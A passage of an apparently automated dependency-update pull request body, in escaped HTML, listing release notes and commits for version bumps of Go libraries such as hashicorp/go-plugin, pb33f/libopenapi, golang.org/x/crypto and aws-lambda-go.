href=\"https://github.com/abhijeetviswa\"\u003e\u003ccode\u003e@​abhijeetviswa\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/342\"\u003ehashicorp/go-plugin#342\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/compliance-pr-automation-bot\"\u003e\u003ccode\u003e@​compliance-pr-automation-bot\u003c/code\u003e\u003c/a\u003e[bot] made their first contribution in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/350\"\u003ehashicorp/go-plugin#350\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apparentlymart\"\u003e\u003ccode\u003e@​apparentlymart\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/352\"\u003ehashicorp/go-plugin#352\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/hashicorp/go-plugin/compare/v1.6.3...v1.7.0\"\u003ehttps://github.com/hashicorp/go-plugin/compare/v1.6.3...v1.7.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/hashicorp/go-plugin/blob/main/CHANGELOG.md\"\u003egithub.com/hashicorp/go-plugin's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.7.0\u003c/h2\u003e\n\u003cp\u003eCHANGES:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eWhen go-plugin encounters a stack trace on the server stderr stream, it now raises output to a log-level of Error instead of Debug. [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/292\"\u003eGH-292\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDon't spend resources parsing log lines when logging is disabled [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/352\"\u003eGH-352\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.6.2\u003c/h2\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for gRPC dial options to the \u003ccode\u003eDial\u003c/code\u003e API [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/257\"\u003eGH-257\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eBUGS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a bug where reattaching to a plugin that exits could kill an unrelated process [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/320\"\u003eGH-320\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.6.1\u003c/h2\u003e\n\u003cp\u003eBUGS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSuppress spurious \u003ccode\u003eos.ErrClosed\u003c/code\u003e on plugin shutdown [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/299\"\u003eGH-299\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003edeps: bump google.golang.org/grpc to v1.58.3 [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/296\"\u003eGH-296\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.6.0\u003c/h2\u003e\n\u003cp\u003eCHANGES:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eplugin: Plugins written in other languages can optionally start to advertise whether they support gRPC broker multiplexing.\nIf the environment variable \u003ccode\u003ePLUGIN_MULTIPLEX_GRPC\u003c/code\u003e is set, it is safe to include a seventh field containing a boolean\nvalue in the \u003ccode\u003e|\u003c/code\u003e-separated protocol negotiation line.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSupport muxing gRPC broker connections over a single listener [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/288\"\u003eGH-288\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eclient: Configurable buffer size for reading plugin log lines [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/265\"\u003eGH-265\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse \u003ccode\u003ebuf\u003c/code\u003e for proto generation [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/286\"\u003eGH-286\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003edeps: bump golang.org/x/net to v0.17.0 [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/285\"\u003eGH-285\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003edeps: bump golang.org/x/sys to v0.13.0 [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/285\"\u003eGH-285\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003edeps: bump golang.org/x/text to v0.13.0 [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/285\"\u003eGH-285\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.5.2\u003c/h2\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/92fb14e530db1a4d6d1053adb0f823155f52165d\"\u003e\u003ccode\u003e92fb14e\u003c/code\u003e\u003c/a\u003e update changelog for v1.7.0 (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/356\"\u003e#356\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/d2a064ec63aa639d29c3d7b64a50776d42982c29\"\u003e\u003ccode\u003ed2a064e\u003c/code\u003e\u003c/a\u003e Complete the implementation of moving panics to the Error log level (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/353\"\u003e#353\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/b02adb3fdfefea44ec04ee09074fcc93a42e6302\"\u003e\u003ccode\u003eb02adb3\u003c/code\u003e\u003c/a\u003e Spend less time preparing to write log lines when the logger is disabled (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/352\"\u003e#352\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/a938e9a3385168c366e944d3c16a95a9a9b03d31\"\u003e\u003ccode\u003ea938e9a\u003c/code\u003e\u003c/a\u003e [Compliance] - PR Template Changes Required (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/350\"\u003e#350\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/f4acdfe4f62c0daa216fc951a525ae578daadcae\"\u003e\u003ccode\u003ef4acdfe\u003c/code\u003e\u003c/a\u003e Bump protobuf from 4.24.4 to 4.25.8 in /examples/grpc/plugin-python (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/348\"\u003e#348\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/ba61a6548317254b855e92042150362cd17c7e0c\"\u003e\u003ccode\u003eba61a65\u003c/code\u003e\u003c/a\u003e [chore] : Bump the go group across 2 directories with 7 updates (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/346\"\u003e#346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/64b8d7614c8e0753ad794817a0b034a976bfa97f\"\u003e\u003ccode\u003e64b8d76\u003c/code\u003e\u003c/a\u003e fix additional lint issues and expand linter scope (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/344\"\u003e#344\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/810097c69630b52c15e7ae5e128142069298ab1e\"\u003e\u003ccode\u003e810097c\u003c/code\u003e\u003c/a\u003e [chore] : Bump golang.org/x/net (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/347\"\u003e#347\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/c882484d2f5f3e97a56651924ae0f26e2f84ad74\"\u003e\u003ccode\u003ec882484\u003c/code\u003e\u003c/a\u003e [chore] : Bump the actions group with 3 updates (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/345\"\u003e#345\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/21b9619042fccc8b03bd6fe97a977a77f74ca163\"\u003e\u003ccode\u003e21b9619\u003c/code\u003e\u003c/a\u003e IND-3869 enabling dependabot (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/343\"\u003e#343\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/hashicorp/go-plugin/compare/v1.6.3...v1.7.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/pb33f/libopenapi` from 0.22.3 to 0.35.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pb33f/libopenapi/releases\"\u003egithub.com/pb33f/libopenapi's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.35.1\u003c/h2\u003e\n\u003cp\u003eA big refactor of the low-level model, after years of growth and organic changes. runs faster and cooler now, fewer allocations, less memory, and less number crunching. runs fewer instructions faster, all for \u003cstrong\u003efree.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eAlso fixes a bundling glitch that was keeping old references in play in the model after composed bundling.\u003c/p\u003e\n\u003cp\u003eNo breaking changes, no new features.\u003c/p\u003e\n\u003ch2\u003ev0.35.0\u003c/h2\u003e\n\u003cp\u003eThe release fixes an issue where \u003ccode\u003e$id\u003c/code\u003e was being parsed when inside examples. The index module was also heavily refactored to make it easier to read, operate, and understand, a huge cleanup of years of organic growth. Much more to come.\u003c/p\u003e\n\u003cp\u003eNo breaking changes, no new features, 7% more efficient.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/luke-hagar-sp\"\u003e\u003ccode\u003e@​luke-hagar-sp\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.34.4\u003c/h2\u003e\n\u003cp\u003eFixes security issues and patches issues \u003ca href=\"https://redirect.github.com/pb33f/libopenapi/issues/545\"\u003e#545\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/zhirschtritt\"\u003e\u003ccode\u003e@​zhirschtritt\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.34.3\u003c/h2\u003e\n\u003cp\u003eAddresses \u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/143\"\u003epb33f/wiretap#143\u003c/a\u003e by adding reusable local reference-resolution helpers and ensuring that nested-reference context settings are consistently propagated from document-level config into index/resolver config.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/andreyyudin\"\u003e\u003ccode\u003e@​andreyyudin\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.34.2\u003c/h2\u003e\n\u003cp\u003eFixes issue \u003ca href=\"https://redirect.github.com/daveshanley/vacuum/issues/821\"\u003edaveshanley/vacuum#821\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.34.1\u003c/h2\u003e\n\u003cp\u003eMinor bugfix for vacuum and some multi-file lookup edge cases, no new features, no breaking changes.\u003c/p\u003e\n\u003ch2\u003ev0.34.0\u003c/h2\u003e\n\u003ch2\u003eAdds support for \u003ca href=\"https://spec.openapis.org/arazzo/latest.html\"\u003eArazzo\u003c/a\u003e\u003c/h2\u003e\n\u003cp\u003eDocs \u003ca href=\"https://pb33f.io/libopenapi/arazzo/\"\u003ehttps://pb33f.io/libopenapi/arazzo/\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eConfigurable JSONPath lookup\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/pb33f/libopenapi/pull/535\"\u003epb33f/libopenapi#535\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eUpdates JSONPath lookup in utils to be configuration-aware and safe with recent \u003ca href=\"https://github.com/pb33f/jsonpath\"\u003ehttps://github.com/pb33f/jsonpath\u003c/a\u003e behavior, especially with respect to WithLazyContextTracking().\u003c/p\u003e\n\u003cp\u003eDifferent lookup scenarios need different execution behavior and safety constraints. This keeps existing behavior by default while allowing explicit control and preventing incorrect cache reuse across different JSONPath engine settings.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/andreyyudin\"\u003e\u003ccode\u003e@​andreyyudin\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://redirect.github.com/pb33f/libopenapi/issues/533\"\u003epb33f/libopenapi#533\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eNew \u003ccode\u003eCreateSchemaProxyRefWithSchema(ref string, schema *Schema)\u003c/code\u003e introduced\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix goroutine leak in schema\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/badb17a26aaf89190194e2fbdb1590b08ef25328\"\u003e\u003ccode\u003ebadb17a\u003c/code\u003e\u003c/a\u003e bumping coverage\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/85682e1e48ed2be8cac175ce7ced4f2946c9cf5a\"\u003e\u003ccode\u003e85682e1\u003c/code\u003e\u003c/a\u003e fixing nil checks and borked pipeline.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/cda65e2d632670e0af023c1aa34945f935ec991c\"\u003e\u003ccode\u003ecda65e2\u003c/code\u003e\u003c/a\u003e more model refactoring and cleanup.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/10828caacd4b3253ba2fa9fb4ef930d9eaccdd07\"\u003e\u003ccode\u003e10828ca\u003c/code\u003e\u003c/a\u003e working through model performance refactor\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/af72cd2a52fae2f3b16ca9f570f646cb6fc82afd\"\u003e\u003ccode\u003eaf72cd2\u003c/code\u003e\u003c/a\u003e refactoring schema performance and clarity\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/65096b4e066d33bd3c9b5d5d4cbf772d584063a5\"\u003e\u003ccode\u003e65096b4\u003c/code\u003e\u003c/a\u003e fix stale references being returned after bundling\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/da443c119275140cde89930b81b855d927fbf2b1\"\u003e\u003ccode\u003eda443c1\u003c/code\u003e\u003c/a\u003e rebased and ported luke's work\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/2d7f1c67e45831d6d9ac9233f60a07a1cd128a67\"\u003e\u003ccode\u003e2d7f1c6\u003c/code\u003e\u003c/a\u003e address coverage issues\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/c85f4e8951d7197b96c51ac899c435489050a62e\"\u003e\u003ccode\u003ec85f4e8\u003c/code\u003e\u003c/a\u003e OH WINDOWS. PLEASE. STOP BEING STRANGE\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/660a62f9fccd506c4d3712adfa005ee4e50e6d46\"\u003e\u003ccode\u003e660a62f\u003c/code\u003e\u003c/a\u003e fixing windows issues.\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pb33f/libopenapi/compare/v0.22.3...v0.35.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/pb33f/libopenapi-validator` from 0.4.7 to 0.13.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pb33f/libopenapi-validator/releases\"\u003egithub.com/pb33f/libopenapi-validator's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.13.3\u003c/h2\u003e\n\u003cp\u003eFixes \u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/issues/27\"\u003e#27\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eAnd fixes \u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/134\"\u003epb33f/wiretap#134\u003c/a\u003e fully\u003c/p\u003e\n\u003ch2\u003ev0.13.2\u003c/h2\u003e\n\u003cp\u003eFixes issues in wiretap\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/91\"\u003epb33f/wiretap#91\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/146\"\u003epb33f/wiretap#146\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/147\"\u003epb33f/wiretap#147\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eand issues\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/issues/191\"\u003e#191\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.13.1\u003c/h2\u003e\n\u003cp\u003eAdds support for passing compiled schemas for document validation. Prevents another compilation step, saving on compute and memory.\u003c/p\u003e\n\u003cp\u003eNo breaking changes.\u003c/p\u003e\n\u003ch2\u003ev0.13.0\u003c/h2\u003e\n\u003cp\u003eRefactored \u003ccode\u003eSchemaValidationFailure \u003c/code\u003estruct fields.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eThis is a breaking change,\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/pull/188\"\u003epb33f/libopenapi-validator#188\u003c/a\u003e\n\u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/pull/200\"\u003epb33f/libopenapi-validator#200\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/mjbonifacio\"\u003e\u003ccode\u003e@​mjbonifacio\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eAlso implemented a RadixTree design to speed up path lookup.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/pull/217\"\u003epb33f/libopenapi-validator#217\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/its-hammer-time\"\u003e\u003ccode\u003e@​its-hammer-time\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.12.1\u003c/h2\u003e\n\u003cp\u003eAdds support for all authentication types.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/x-delfino\"\u003e\u003ccode\u003e@​x-delfino\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.12.0\u003c/h2\u003e\n\u003cp\u003eAdds XML body validation with the addition of \u003ccode\u003eAllowXMLBodyValidation\u003c/code\u003e as a configuration option. Also adds support for \u003ccode\u003ex-www-form-urlencoded\u003c/code\u003e validation.\u003c/p\u003e\n\u003cp\u003eNo breaking changes.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/ySnoopyDogy\"\u003e\u003ccode\u003e@​ySnoopyDogy\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/1151bc5b91c4862406d096b628d43408f8f48237\"\u003e\u003ccode\u003e1151bc5\u003c/code\u003e\u003c/a\u003e Address \u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/issues/27\"\u003e#27\u003c/a\u003e fully\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/04d2b62899469b2510c63b144204b7e6d6e0dbce\"\u003e\u003ccode\u003e04d2b62\u003c/code\u003e\u003c/a\u003e fully address \u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/134\"\u003epb33f/wiretap#134\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/881f8cbbc7629f6e03c1449d402cbbda1e1f6c58\"\u003e\u003ccode\u003e881f8cb\u003c/code\u003e\u003c/a\u003e cleanup\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/1e37fc1d278e0f32bf5eaa70751414b07cd3f99d\"\u003e\u003ccode\u003e1e37fc1\u003c/code\u003e\u003c/a\u003e address \u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/issues/191\"\u003e#191\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/07b06ebb04115eb7eb60e78c618572deab5edfd9\"\u003e\u003ccode\u003e07b06eb\u003c/code\u003e\u003c/a\u003e upodated test to be more useful\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/39485c117b6df302dd377572da0db7812a9f7d96\"\u003e\u003ccode\u003e39485c1\u003c/code\u003e\u003c/a\u003e Address \u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/issues/247\"\u003epb33f/libopenapi-validator#247\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/39db7ef1bc65feb98a2c75589e37d811fcbc3d44\"\u003e\u003ccode\u003e39db7ef\u003c/code\u003e\u003c/a\u003e address \u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/91\"\u003epb33f/wiretap#91\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/04189e533b6d6bcdb63c0752fd6a35530a0bd322\"\u003e\u003ccode\u003e04189e5\u003c/code\u003e\u003c/a\u003e address issue \u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/146\"\u003epb33f/wiretap#146\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/ce277214ae87e91a8a5d21163811dd75ba91b336\"\u003e\u003ccode\u003ece27721\u003c/code\u003e\u003c/a\u003e Addressing  \u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/147\"\u003epb33f/wiretap#147\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/16cd936076a92c4f23aa5975f3a3d2bce2501efd\"\u003e\u003ccode\u003e16cd936\u003c/code\u003e\u003c/a\u003e bump that coverage!\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pb33f/libopenapi-validator/compare/v0.4.7...v0.13.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `golang.org/x/crypto` from 0.41.0 to 0.48.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/e08b06753d6a72f1fe375b6e0fefefb39917c165\"\u003e\u003ccode\u003ee08b067\u003c/code\u003e\u003c/a\u003e go.mod: update golang.org/x dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/7d0074ccc6f17acbf2ebb10db06d492e08f887dc\"\u003e\u003ccode\u003e7d0074c\u003c/code\u003e\u003c/a\u003e scrypt: fix panic on parameters \u0026lt;= 0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/506e022208b864bc3c9c4a416fe56be75d10ad24\"\u003e\u003ccode\u003e506e022\u003c/code\u003e\u003c/a\u003e go.mod: update golang.org/x dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/7dacc380ba001e8fe7c3c7a46bf3cbdaa5064df9\"\u003e\u003ccode\u003e7dacc38\u003c/code\u003e\u003c/a\u003e chacha20poly1305: error out in fips140=only mode\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/19acf81bd7bc7b558d18a550e8e023df2c33e742\"\u003e\u003ccode\u003e19acf81\u003c/code\u003e\u003c/a\u003e go.mod: update golang.org/x dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/3a1c6b4b61966d06b6469ad7bc15839ba76eeb89\"\u003e\u003ccode\u003e3a1c6b4\u003c/code\u003e\u003c/a\u003e x509roots/fallback: update bundle\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/f4602e40409257658159002a9af6aedb875949fb\"\u003e\u003ccode\u003ef4602e4\u003c/code\u003e\u003c/a\u003e ssh/agent: fix flaky test by ensuring a writeable home directory\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/4e0068c0098be10d7025c99ab7c50ce454c1f0f9\"\u003e\u003ccode\u003e4e0068c\u003c/code\u003e\u003c/a\u003e go.mod: update golang.org/x dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/e79546e28b85ea53dd37afe1c4102746ef553b9c\"\u003e\u003ccode\u003ee79546e\u003c/code\u003e\u003c/a\u003e ssh: curb GSSAPI DoS risk by limiting number of specified OIDs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/f91f7a7c31bf90b39c1de895ad116a2bacc88748\"\u003e\u003ccode\u003ef91f7a7\u003c/code\u003e\u003c/a\u003e ssh/agent: prevent panic on malformed constraint\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/golang/crypto/compare/v0.41.0...v0.48.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `google.golang.org/protobuf` from 1.36.1 to 1.36.6\n\nUpdates `github.com/aws/aws-lambda-go` from 1.49.0 to 1.54.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-lambda-go/releases\"\u003egithub.com/aws/aws-lambda-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.54.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAllow ClientContext.Custom unmarshaling for non-string (JSON) values by \u003ca href=\"https://github.com/M-Elsaeed\"\u003e\u003ccode\u003e@​M-Elsaeed\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/620\"\u003eaws/aws-lambda-go#620\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/M-Elsaeed\"\u003e\u003ccode\u003e@​M-Elsaeed\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/620\"\u003eaws/aws-lambda-go#620\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: 